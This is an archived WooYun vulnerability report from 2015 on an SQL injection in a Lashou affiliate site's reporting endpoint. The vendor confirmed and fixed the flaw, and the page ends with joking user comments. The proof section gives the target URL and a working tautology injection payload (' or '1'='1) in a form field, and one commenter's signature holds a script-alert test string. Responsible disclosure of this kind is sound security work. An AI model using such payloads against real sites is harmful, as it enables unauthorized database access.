当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118484

漏洞标题:拉手网某分站SQL注入一枚

相关厂商:拉手网

漏洞作者: 小川

提交时间:2015-06-05 18:20

修复时间:2015-06-11 10:43

公开时间:2015-06-11 10:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

我要加入联盟,收了我吧

详细说明:

ragecomic.png

漏洞证明:

捕获.PNG


http://union.lashou.com/index.php?r=effect/site/report
TuiForNetForm[starttime]=2015-05-10&TuiForNetForm[endtime]=2015-05-10' or '1'='1&TuiForNetForm[type]=5

修复方案:

过滤

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-06-08 10:08

厂商回复:

谢谢您的关注,问题已经和研发核实,正在整改中.对于您的报告我们深表赞赏,内容详实,诙谐幽默,希望保持.万福.

最新状态:

2015-06-11:修复完成.谢谢.


漏洞评价:

评论

  1. 2015-06-05 18:31 | DeadSea ( 实习白帽子 | Rank:86 漏洞数:28 | 静心)

    第一次做到沙发。我是来看暴漫的

  2. 2015-06-05 18:41 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    我是来看暴漫的

  3. 2015-06-05 20:21 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    我是来看@小川果照的

  4. 2015-06-06 08:03 | Catsay ( 实习白帽子 | Rank:85 漏洞数:16 | 屌丝一枚)

    来看暴漫

  5. 2015-06-06 09:16 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    我是来看暴漫的

  6. 2015-06-06 09:41 | 北丐 ( 普通白帽子 | Rank:104 漏洞数:20 | )

    我是来看暴漫的

  7. 2015-06-12 19:15 | 海口学哥 ( 路人 | Rank:4 漏洞数:1 | 漏洞挖掘。。。)

    我是来看暴漫的

  8. 2015-06-26 14:25 | 黑色雨滴 ( 路人 | Rank:29 漏洞数:8 | 没有主页新手一个前来玩玩)

    我是来看暴漫的

  9. 2015-06-27 17:56 | Alan* ( 路人 | Rank:16 漏洞数:5 | 少壮不努力,长大捡垃圾)

    我是来看暴漫的

  10. 2015-08-05 22:07 | justpluto ( 路人 | Rank:15 漏洞数:1 | exploit%00)

    我是来看暴漫的